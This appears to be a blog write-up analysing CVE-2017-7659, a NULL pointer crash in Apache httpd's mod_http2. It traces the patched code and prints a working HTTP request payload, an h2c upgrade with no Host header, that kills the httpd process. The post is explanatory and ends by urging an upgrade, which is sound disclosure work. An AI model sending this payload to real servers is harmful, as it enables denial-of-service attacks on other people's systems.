Recently, Apache released Apache httpd 2.4.26. And 2.4.26 fix a lot of issues. You can find the detail in this link. One of the issue is CVE-2017-7659. This article will discuss this issue and show the payload.
For CVE-2017-7659, Apache gives follow description:
A maliciously constructed HTTP/2 request could cause mod_http2 to dereference a NULL pointer and crash the server process.
We can know that this issue is related HTTP 2.0 protocol. In the Github, it gives us which code they changed. The detail please click this link.
We can find that only one line changed, which is that check the h2_request_rcreate function’s return value.
CVE-2017-7659 issue is related h2_request_rcreate function. So, let’s check this function.
If we read the issue code, we can find that Apache uses h2_request_rcreate function to create HTTP 2.0 data structure req. If h2_request_rcreat is failed, req will become to NULL. When ap_log_rerror uses it, it will lead the HTTP process break down. (Please check the following code)
Then, we go to h2_request_rcreate function. We can find that in the begin, this function setup req to 0, then check 4 variables: r->method, scheme, r->hostname and path. If any of these variables is NULL, it will return failed. And if it return failed, the req still is 0, and the HTTP process will be break down.
In these variables, only hostname could be NULL. So that, if we create a HTTP request without hostname, it will break down the Apache http process.
Now, let’s create CVE-2017-7659 payload. To trigger this issue, the website must:
- Support HTTP 2.0
- Submit HTTP 1.0 request without Hostname parameter.
This is the CVE-2017-7659 payload. Using HTTP1.0 Protocol, and does not have Hostname.
GET / HTTP/1.0 User-Agent: curl/7.50.1 Accept: */* Connection: Upgrade, HTTP2-Settings Upgrade: h2c HTTP2-Settings: AAMAAABkAAQAAP__ Content-Length: 2
First, I implement a Apache HTTP server on my Kali Linux. The version is 2.4.25.
Then, I start apache, the website and server is working very well.
However, if I submit this payload by using BurpSuite.
After submit the payload, the website does not give any response. If you check the Apache Log. you will find segment fault error. The HTTPD process is dead.
CVE-2017-7659 can be use to do DoS attack. It can easily to kill your Apache HTTP Server process. So, for me, Highly recommend upgrade your Apache HTTP Srver.